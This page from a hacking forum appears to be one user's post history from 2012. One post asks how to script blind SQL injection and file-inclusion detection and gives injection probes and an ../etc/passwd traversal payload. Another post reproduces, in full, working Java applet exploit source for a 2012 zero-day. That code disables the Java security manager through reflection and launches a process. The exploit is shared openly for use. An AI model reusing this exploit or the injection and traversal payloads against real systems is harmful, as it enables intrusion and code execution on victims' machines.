how do I see if a sqli works when I have to use ' and there is no error message displayed?

13
Hacking and Security / how to find webVulns by Script?
« on: August 31, 2012, 05:11:54 am »

Hi EZ Members

I'm have a quite good knowledge and some experience in sqli and lfi.
Yet I struggle to copy that into a script. The big Question is actually how to determine a vulnerability if there is no error output?
What is the fastest way?

I had a few thoughts...

about sqli without error output:
    1. numeric input if id=7 is the same as id=8-1. there is a good chance for sqli
    2. if site=home and site=substring('home',1,4) is the same there is also a good chance for sqli

   
about lfi without error output:
    1. just try ../..  (...)  ../etc/passwd and boot.ini and check for a difference in content length 


so the scripts looks at a specific get/post field:

suppose I need '
    1. generate query with ' at the end of the standard value ( if any )
    2. search in the content for sql errors, php errors, other errors -> exit if yes
    3. try something  like ' and '1'='1 and see if you get same ouput then normal ??? ??
        I really don't know how to check this case ???

suppose I don't need '
    4. if numeric try the subtraction (1.) and if not try the substring (2.) -> exit if content length is the same as normal input

and lfi:
    5. try passwd and boot.ini and compare content length

    6. not vuln or try some other stuff ..

   

14
Hacking and Security / Re: Java Browser Exploitation
« on: August 30, 2012, 11:33:54 pm »
This should be it:

Code: [Select]

    //
    // CVE-2012-XXXX Java 0day
    //
    // reported here: [url]http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html[/url]
    //
    // secret host / ip : ok.aa24.net / 59.120.154.62
    //
    // regurgitated by jduck
    //
    // probably a metasploit module soon...
    //
    package cve2012xxxx;
     
    import java.applet.Applet;
    import java.awt.Graphics;
    import java.beans.Expression;
    import java.beans.Statement;
    import java.lang.reflect.Field;
    import java.net.URL;
    import java.security.*;
    import java.security.cert.Certificate;
     
    public class Gondvv extends Applet
    {
     
        public Gondvv()
        {
        }
     
        public void disableSecurity()
            throws Throwable
        {
            Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
            Permissions localPermissions = new Permissions();
            localPermissions.add(new AllPermission());
            ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
            AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
                localProtectionDomain
            });
            SetField(Statement.class, "acc", localStatement, localAccessControlContext);
            localStatement.execute();
        }
     
        private Class GetClass(String paramString)
            throws Throwable
        {
            Object arrayOfObject[] = new Object[1];
            arrayOfObject[0] = paramString;
            Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
            localExpression.execute();
            return (Class)localExpression.getValue();
        }
     
        private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
            throws Throwable
        {
            Object arrayOfObject[] = new Object[2];
            arrayOfObject[0] = paramClass;
            arrayOfObject[1] = paramString;
            Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
            localExpression.execute();
            ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
        }
     
        public void init()
        {
            try
            {
                disableSecurity();
                Process localProcess = null;
                localProcess = Runtime.getRuntime().exec("calc.exe");
                if(localProcess != null);
                   localProcess.waitFor();
            }
            catch(Throwable localThrowable)
            {
                localThrowable.printStackTrace();
            }
        }
     
        public void paint(Graphics paramGraphics)
        {
            paramGraphics.drawString("Loading", 50, 25);
        }
    }


15
Creative Arts / Re: Minecraft
« on: August 30, 2012, 02:25:30 am »

Pages: [1] 2